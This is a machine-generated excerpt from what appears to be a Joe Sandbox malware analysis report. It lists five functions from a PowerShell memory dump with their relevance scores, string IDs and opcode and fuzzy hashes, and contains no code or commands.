                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$4'^q$4'^q
                                                            • API String ID: 0-1420252700
                                                            • Opcode ID: bc4d22947dbabf30a56de982c0c343cc2108aa868e9f98769f51c4cabdf73538
                                                            • Instruction ID: 5cd83fe60af69ad7a48f04c8e3a08e673b40244308d7190ff1096267af7a2963
                                                            • Opcode Fuzzy Hash: bc4d22947dbabf30a56de982c0c343cc2108aa868e9f98769f51c4cabdf73538
                                                            • Instruction Fuzzy Hash: DC123F74A00228DFDB64DB64C950BDEBBB2BF89304F108599E5096B395CB31ED86CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0702FBE8 Relevance: 5.1, Strings: 4, Instructions: 115COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: XRcq$XRcq$tP^q$$^q
                                                            • API String ID: 0-3596674671
                                                            • Opcode ID: b3b83bb198ed606bbce2cba09716fc3472e73dcb0ce3ba8736133a7eee7f4677
                                                            • Instruction ID: f164a3cd236ce64de99f505eef9edee80d4d8b0c4649394e18523189b511cf8c
                                                            • Opcode Fuzzy Hash: b3b83bb198ed606bbce2cba09716fc3472e73dcb0ce3ba8736133a7eee7f4677
                                                            • Instruction Fuzzy Hash: E041D3B2A0022BDBDB24CE19C244A6ABBF2AF85790F25C659D8146B255C731FD43DB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0702A030 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $^q$$^q$$^q$$^q
                                                            • API String ID: 0-2125118731
                                                            • Opcode ID: 3d757c292045a8420896c5e101dfe139379c053b2292460ed0e017d21a413854
                                                            • Instruction ID: 62016a753165c3ce4cc0c81928480b81c1ac6c2e6ef0bff7fc3b75c3ba27e39a
                                                            • Opcode Fuzzy Hash: 3d757c292045a8420896c5e101dfe139379c053b2292460ed0e017d21a413854
                                                            • Instruction Fuzzy Hash: 4D2149F27103265BDB74457A8880B2BB6DA5FC0711F24C93AAD09CB385CD36C84A9261
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0702B440 Relevance: 5.1, Strings: 4, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $^q$$^q$$^q$$^q
                                                            • API String ID: 0-2125118731
                                                            • Opcode ID: f3405e1d5c1848311d7587e4e58485ae7848898b37f362d02b6ac706fd2c6299
                                                            • Instruction ID: 4de646ef818a07bd0f56175af666769abbd51cc64a0b5c04ab3404e8b6cebca0
                                                            • Opcode Fuzzy Hash: f3405e1d5c1848311d7587e4e58485ae7848898b37f362d02b6ac706fd2c6299
                                                            • Instruction Fuzzy Hash: 3E21B5F3904376DBDB658E25849076A7BF0AF46310F1846AAC8458F206F735C946E762
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 070203ED Relevance: 5.0, Strings: 4, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$$^q$$^q
                                                            • API String ID: 0-2049395529
                                                            • Opcode ID: f9667d7ee3e466f710e36f4c93e2b2d049ebae2c4c8e72686bbcbeafaba9d409
                                                            • Instruction ID: 6197b4c5beb44662fb17c09f903272f2c41448e90bf5b9c7313c39853e13057c
                                                            • Opcode Fuzzy Hash: f9667d7ee3e466f710e36f4c93e2b2d049ebae2c4c8e72686bbcbeafaba9d409
                                                            • Instruction Fuzzy Hash: 8AF02DB17093668FC32A061818201656BF25FC2540765459BC041DF39BCE658C4E8396
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%